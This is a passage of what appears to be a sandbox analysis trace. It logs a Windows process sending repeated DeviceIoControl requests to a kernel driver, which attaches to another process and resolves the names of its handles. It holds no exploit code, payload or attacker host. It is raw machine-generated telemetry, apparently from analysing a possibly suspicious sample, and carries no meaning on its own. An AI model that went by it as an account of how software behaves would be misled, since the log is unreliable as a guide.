PriorityBoost=0) [0244.577] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.577] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.577] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.577] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.577] PsAcquireProcessExitSynchronization () returned 0x0 [0244.577] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.577] ObReferenceObjectByHandle (in: Handle=0x40c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80038e3960, HandleInformation=0x0) returned 0x0 [0244.577] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.577] PsReleaseProcessExitSynchronization () returned 0x2 [0244.577] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.577] ObQueryNameString (in: Object=0xfffffa80038e3960, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.577] ObfDereferenceObject (Object=0xfffffa80038e3960) returned 0x1 [0244.577] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.577] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.577] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.577] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3c, lpOverlapped=0x0) returned 1 [0244.577] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.577] PsAcquireProcessExitSynchronization () returned 0x0 [0244.577] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.577] ObReferenceObjectByHandle (in: Handle=0x440, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a9d5f0, HandleInformation=0x0) returned 0x0 [0244.577] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.577] PsReleaseProcessExitSynchronization () returned 0x2 [0244.577] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.577] ObQueryNameString (in: Object=0xfffffa8003a9d5f0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.577] ObfDereferenceObject (Object=0xfffffa8003a9d5f0) returned 0x2 [0244.577] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.577] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.577] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.577] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xd0, lpOverlapped=0x0) returned 1 [0244.577] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.577] PsAcquireProcessExitSynchronization () returned 0x0 [0244.578] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.578] ObReferenceObjectByHandle (in: Handle=0x474, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8010bbbf20, HandleInformation=0x0) returned 0x0 [0244.578] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.578] PsReleaseProcessExitSynchronization () returned 0x2 [0244.578] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.578] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.578] ObfDereferenceObject (Object=0xfffffa8010bbbf20) returned 0x6 [0244.578] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.578] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.578] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.578] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xd2, lpOverlapped=0x0) returned 1 [0244.578] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.578] PsAcquireProcessExitSynchronization () returned 0x0 [0244.578] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.578] ObReferenceObjectByHandle (in: Handle=0x4a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003883280, HandleInformation=0x0) returned 0x0 [0244.578] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.578] PsReleaseProcessExitSynchronization () returned 0x2 [0244.578] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.578] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.578] ObfDereferenceObject (Object=0xfffffa8003883280) returned 0x12 [0244.578] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.578] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.578] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.578] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xc6, lpOverlapped=0x0) returned 1 [0244.578] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.578] PsAcquireProcessExitSynchronization () returned 0x0 [0244.578] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.578] ObReferenceObjectByHandle (in: Handle=0x4a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036be3d0, HandleInformation=0x0) returned 0x0 [0244.578] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.578] PsReleaseProcessExitSynchronization () returned 0x2 [0244.578] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.578] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.579] ObfDereferenceObject (Object=0xfffffa80036be3d0) returned 0x12 [0244.579] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.579] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.579] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.579] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xd4, lpOverlapped=0x0) returned 1 [0244.579] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.579] PsAcquireProcessExitSynchronization () returned 0x0 [0244.579] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.579] ObReferenceObjectByHandle (in: Handle=0x4b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034a5070, HandleInformation=0x0) returned 0x0 [0244.579] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.579] PsReleaseProcessExitSynchronization () returned 0x2 [0244.579] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.579] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.579] ObfDereferenceObject (Object=0xfffffa80034a5070) returned 0x13 [0244.579] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.579] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.579] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.579] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xca, lpOverlapped=0x0) returned 1 [0244.579] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.579] PsAcquireProcessExitSynchronization () returned 0x0 [0244.579] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.579] ObReferenceObjectByHandle (in: Handle=0x4b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036fa740, HandleInformation=0x0) returned 0x0 [0244.579] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.579] PsReleaseProcessExitSynchronization () returned 0x2 [0244.579] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.579] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.580] ObfDereferenceObject (Object=0xfffffa80036fa740) returned 0x21 [0244.580] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.580] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.580] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.580] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xcc, lpOverlapped=0x0) returned 1 [0244.580] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.580] PsAcquireProcessExitSynchronization () returned 0x0 [0244.580] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.580] ObReferenceObjectByHandle (in: Handle=0x4b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036fa490, HandleInformation=0x0) returned 0x0 [0244.580] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.580] PsReleaseProcessExitSynchronization () returned 0x2 [0244.580] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.580] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.580] ObfDereferenceObject (Object=0xfffffa80036fa490) returned 0x12 [0244.580] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.580] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.580] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.580] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0244.580] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.580] PsAcquireProcessExitSynchronization () returned 0x0 [0244.580] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.580] ObReferenceObjectByHandle (in: Handle=0x4c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037072c0, HandleInformation=0x0) returned 0x0 [0244.580] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.580] PsReleaseProcessExitSynchronization () returned 0x2 [0244.580] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.580] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.580] ObfDereferenceObject (Object=0xfffffa80037072c0) returned 0x12 [0244.580] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.580] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.581] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.581] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xd8, lpOverlapped=0x0) returned 1 [0244.581] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.581] PsAcquireProcessExitSynchronization () returned 0x0 [0244.581] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.581] ObReferenceObjectByHandle (in: Handle=0x4cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003734070, HandleInformation=0x0) returned 0x0 [0244.581] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.581] PsReleaseProcessExitSynchronization () returned 0x2 [0244.581] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.581] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.581] ObfDereferenceObject (Object=0xfffffa8003734070) returned 0x13 [0244.581] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.581] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.581] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.581] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xf8, lpOverlapped=0x0) returned 1 [0244.581] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.581] PsAcquireProcessExitSynchronization () returned 0x0 [0244.581] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.581] ObReferenceObjectByHandle (in: Handle=0x4e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036bb750, HandleInformation=0x0) returned 0x0 [0244.581] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.581] PsReleaseProcessExitSynchronization () returned 0x2 [0244.581] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.581] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.581] ObfDereferenceObject (Object=0xfffffa80036bb750) returned 0x12 [0244.581] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.581] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.581] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.582] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x104, lpOverlapped=0x0) returned 1 [0244.582] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.582] PsAcquireProcessExitSynchronization () returned 0x0 [0244.582] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.582] ObReferenceObjectByHandle (in: Handle=0x4ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036bb4b0, HandleInformation=0x0) returned 0x0 [0244.582] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.582] PsReleaseProcessExitSynchronization () returned 0x2 [0244.582] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.582] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.582] ObfDereferenceObject (Object=0xfffffa80036bb4b0) returned 0x13 [0244.582] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.582] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.582] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.582] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xda, lpOverlapped=0x0) returned 1 [0244.582] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.582] PsAcquireProcessExitSynchronization () returned 0x0 [0244.582] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.582] ObReferenceObjectByHandle (in: Handle=0x504, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003759750, HandleInformation=0x0) returned 0x0 [0244.582] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.582] PsReleaseProcessExitSynchronization () returned 0x2 [0244.582] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.582] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.582] ObfDereferenceObject (Object=0xfffffa8003759750) returned 0x12 [0244.582] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.582] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.582] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.582] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x104, lpOverlapped=0x0) returned 1 [0244.583] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.583] PsAcquireProcessExitSynchronization () returned 0x0 [0244.583] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.583] ObReferenceObjectByHandle (in: Handle=0x598, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034e05a0, HandleInformation=0x0) returned 0x0 [0244.583] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.583] PsReleaseProcessExitSynchronization () returned 0x2 [0244.583] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.583] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.583] ObfDereferenceObject (Object=0xfffffa80034e05a0) returned 0x20 [0244.583] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.583] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.583] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.583] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xc4, lpOverlapped=0x0) returned 1 [0244.583] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.583] PsAcquireProcessExitSynchronization () returned 0x0 [0244.583] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.583] ObReferenceObjectByHandle (in: Handle=0x5a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034dd3d0, HandleInformation=0x0) returned 0x0 [0244.583] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.583] PsReleaseProcessExitSynchronization () returned 0x2 [0244.583] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.583] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.583] ObfDereferenceObject (Object=0xfffffa80034dd3d0) returned 0x12 [0244.583] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.583] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.583] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.583] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, 